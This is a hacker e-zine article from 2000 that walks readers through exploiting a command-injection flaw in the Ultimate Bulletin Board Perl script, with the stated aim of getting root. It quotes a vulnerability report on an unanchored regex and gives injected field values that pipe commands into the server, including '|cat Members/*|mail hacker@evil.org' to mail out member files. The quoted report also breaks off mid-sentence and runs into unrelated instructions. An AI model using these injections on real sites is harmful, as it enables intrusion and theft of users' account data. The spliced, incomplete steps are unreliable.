SWAT MAGAZINE ISSUE THIRTY TWO AUGUST 2000
-----------------------------------------------------------------------
                             hacking UBB
                             SNaFu "MGD"
-----------------------------------------------------------------------
www.themgd.co.uk

I've read SWAT for a long time but I've never written for them before, so sorry if this isn't up to the usual high standard that the average SWAT article is, but it's my first attempt so gimme a break. I'm gonna write some more articles if I get round to it (in fact I'm pretty damn sure I will get round to it cos I've been grounded for the next 6 months).

OK, 'nuff of the shit, let's get down to the 'sploit. Any self-respecting hacker has heard of the wwwboard exploit; well, this one takes it a lot further and hopefully, with a bit of luck, will get you r00t.

The target is Ultimate Bulletin Board. This is just like wwwboard but a lot more sophisticated; it is a Perl script that a lot of respected sites use (including progenic).

This is the file I got that told me about the exploit:

-----------------------------------------------------------------------
"Hello.

Writing cgi scripts in perl is simple. It's also rather safe, providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-made scripts, but rather commercial software product. Hey, said I to myself, remember that story about pcweek hack? They use commercial package photoads. Let's look what that Ultimate Bulletin Board by Infopop is.

I grabbed freeware version from http://www.ultimatebb.com and after 10-minutes grepping found those lines:

ubb_library.pl:901-902
    if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
    open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

(notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while writing it? Girls?)

And the $ThreadFile takes its value directly from the hidden (hmm!) field `topic'.
So when I filled the form with topic='012345.ubb|mail hacker@evil.com

(if you try a different site to the demonstration then the 000369.cgi bit will be different) Once you have found this, copy "|cat Members/*|mail hacker@evil.org" and paste it right after 000369.cgi so it looks like this (obviously substituting evil@hacker for your e-mail addy)

OK, save this and go back to the bit where you got the source code from. Look for a link saying "want to register" on the left hand side. Once you have found the link, right click it and "copy shortcut" it. Now go back into the source and find this line